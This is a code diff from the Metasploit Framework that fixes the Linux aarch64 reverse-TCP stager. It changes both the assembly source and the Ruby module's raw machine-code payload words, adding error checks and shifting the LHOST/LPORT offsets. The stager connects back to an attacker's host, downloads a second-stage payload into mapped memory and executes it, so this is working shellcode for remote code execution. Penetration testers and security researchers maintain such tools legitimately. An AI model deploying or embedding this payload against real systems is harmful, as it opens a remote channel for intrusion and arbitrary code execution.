diff --git a/external/source/shellcode/linux/aarch64/stager_sock_reverse.s b/external/source/shellcode/linux/aarch64/stager_sock_reverse.s index 7c049b8308..7bf02f863e 100644 --- a/external/source/shellcode/linux/aarch64/stager_sock_reverse.s +++ b/external/source/shellcode/linux/aarch64/stager_sock_reverse.s @@ -37,9 +37,10 @@ start: mov x2, #4 mov x8, SYS_READ svc 0 - cbz w0, failed + cmn x0, #0x1 + beq failed - ldr x2, [sp,#0] + ldr w2, [sp,#0] /* Page-align, assume <4GB */ lsr x2, x2, #12 @@ -53,12 +54,13 @@ start: mov x3, #34 mov x4, xzr mov x5, xzr - /* call mmap() */ - movi x8, SYS_MMAP + mov x8, SYS_MMAP svc 0 + cmn x0, #0x1 + beq failed /* Grab the saved size, save the address */ - ldr x4, [sp] + ldr w4, [sp] /* Save the memory address */ str x0, [sp] @@ -73,13 +75,15 @@ read_loop: mov x2, x4 mov x8, SYS_READ svc 0 + cmn x0, #0x1 + beq failed add x3, x3, x0 subs x4, x4, x0 bne read_loop /* Go to shellcode */ - ldr x30, [sp] - ret + ldr x0, [sp] + blr x0 failed: mov x0, 0 diff --git a/modules/payloads/stagers/linux/aarch64/reverse_tcp.rb b/modules/payloads/stagers/linux/aarch64/reverse_tcp.rb index 2ebf658320..e2faeb7cbf 100644 --- a/modules/payloads/stagers/linux/aarch64/reverse_tcp.rb +++ b/modules/payloads/stagers/linux/aarch64/reverse_tcp.rb @@ -33,8 +33,8 @@ module MetasploitModule { 'Offsets' => { - 'LPORT' => [ 186, 'n' ], - 'LHOST' => [ 188, 'ADDR' ], + 'LPORT' => [ 206, 'n' ], + 'LHOST' => [ 208, 'ADDR' ], }, 'Payload' => [ @@ -45,19 +45,20 @@ module MetasploitModule 0xd28018c8, # mov x8, #0xc6 // #198 0xd4000001, # svc #0x0 0xaa0003ec, # mov x12, x0 - 0x10000501, # adr x1, b8 + 0x100005a1, # adr x1, cc 0xd2800202, # mov x2, #0x10 // #16 0xd2801968, # mov x8, #0xcb // #203 0xd4000001, # svc #0x0 - 0x35000420, # cbnz w0, ac + 0x350004c0, # cbnz w0, c0 0xaa0c03e0, # mov x0, x12 0xd10043ff, # sub sp, sp, #0x10 0x910003e1, # mov x1, sp 0xd2800082, # mov x2, #0x4 // #4 0xd28007e8, # mov x8, #0x3f // #63 0xd4000001, # svc #0x0 - 0x34000340, # cbz w0, ac - 0xf94003e2, # ldr x2, [sp] + 0xb100041f, # cmn x0, #0x1 + 0x540003c0, # b.eq c0 + 0xb94003e2, # ldr w2, [sp] 0xd34cfc42, # lsr x2, x2, #12 0x91000442, # add x2, x2, #0x1 0xd374cc42, # lsl x2, x2, #12 @@ -69,7 +70,9 @@ module MetasploitModule 0xaa1f03e5, # mov x5, xzr 0xd2801bc8, # mov x8, #0xde // #222 0xd4000001, # svc #0x0 - 0xf94003e4, # ldr x4, [sp] + 0xb100041f, # cmn x0, #0x1 + 0x54000200, # b.eq c0 + 0xb94003e4, # ldr w4, [sp] 0xf90003e0, # str x0, [sp] 0xaa0003e3, # mov x3, x0 0xaa0c03e0, # mov x0, x12 @@ -77,11 +80,13 @@ module MetasploitModule 0xaa0403e2, # mov x2, x4 0xd28007e8, # mov x8, #0x3f // #63 0xd4000001, # svc #0x0 + 0xb100041f, # cmn x0, #0x1 + 0x540000c0, # b.eq c0 0x8b000063, # add x3, x3, x0 0xeb000084, # subs x4, x4, x0 - 0x54ffff21, # b.ne 84 - 0xf94003fe, # ldr x30, [sp] - 0xd65f03c0, # ret + 0x54fffee1, # b.ne 90 + 0xf94003e0, # ldr x0, [sp] + 0xd63f0000, # blr x0 0xd2800000, # mov x0, #0x0 // #0 0xd2800ba8, # mov x8, #0x5d // #93 0xd4000001, # svc #0x0